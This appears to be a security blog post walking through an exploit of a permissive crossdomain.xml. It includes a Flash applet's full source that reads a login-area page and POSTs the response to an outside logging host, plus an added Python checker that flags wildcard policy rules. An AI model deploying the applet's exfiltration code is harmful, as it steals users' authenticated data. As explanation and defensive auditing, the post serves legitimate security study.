Liberal Crossdomain.xml Example – Part 2

As a follow-up to Liberal Crossdomain.xml Exploit Example – Part 1, this is the source for the Flash app.

package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;
 
 public class flasher extends Sprite {
  public function flasher() {
   // Target URL from where the data is to be retrieved
   var readFrom:String = "http://rubysecurity.info/login/info.php";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try 
   {
    getLoader.load(readRequest);
   } 
   catch (error:Error) 
   {
   }
  }
 
  private function eventHandler(event:Event):void 
  { 
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://injectionvector.com/flasher/log.php";
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try 
   {
    sendLoader.load(sendRequest);
   } 
   catch (error:Error) 
   {
   }
  }
 }
}

It’s really a fairly simple Flash applet. The class is called flasher and extends Sprite. Sprite is a base class for UI components that don’t use the timeline. In the constructor it creates a URLRequest object to read data from the location specified in the readFrom variable via a URLLoader object. It then sets an event handler, called eventHandler, that is called when that read is done. When the read is done, it basically does the same thing again, but posts to the URL specified in the sendTo variable and sets the body of the request to the data received in the first step.
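The first read in the applet only succeeds when the target site's crossdomain.xml grants access to the host serving the SWF. As an added example (not part of the original post), this Python check flags the liberal rules in a policy file and reports whether a given third-party host would be allowed; the two policies, the host names and the simplified wildcard matching are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies; not taken from any site named in the post.
LIBERAL = """<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>"""
SCOPED = """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.example.com"/>
</cross-domain-policy>"""


def host_matches(pattern, host):
    """Simplified matching (assumption): '*' is any host, '*.x.com' any subdomain."""
    pattern, host = pattern.lower(), host.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return host == pattern


def audit(xml_text, swf_host):
    """Return (findings, allowed): risky rules, and whether swf_host may read."""
    root = ET.fromstring(xml_text)
    findings, allowed = [], False
    for rule in root.iter("allow-access-from"):
        domain = (rule.get("domain") or "").strip()
        allowed = allowed or host_matches(domain, swf_host)
        if domain == "*":
            findings.append(("high", "domain='*' lets a SWF hosted anywhere read responses"))
        elif domain.startswith("*"):
            findings.append(("medium", "wildcard domain %r trusts every matching host" % domain))
        if (rule.get("secure") or "true").lower() == "false":
            findings.append(("medium", "secure='false' lets HTTP-served SWFs read HTTPS content"))
    site = root.find("site-control")
    if site is not None and site.get("permitted-cross-domain-policies") == "all":
        findings.append(("medium", "site-control 'all' accepts any policy file on the host"))
    return findings, allowed


if __name__ == "__main__":
    for name, policy in (("liberal", LIBERAL), ("scoped", SCOPED)):
        findings, allowed = audit(policy, "untrusted.example.net")
        print(name, "- third-party SWF allowed:", allowed)
        for severity, message in findings:
            print("  [%s] %s" % (severity, message))
```

Run it against the policy file served at the root of each site you operate; any host for which `allowed` is true can read that site's responses with the visitor's cookies attached.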

Note: This is based off an example that I found, but have misplaced. Once found, I will update the post to reference it.
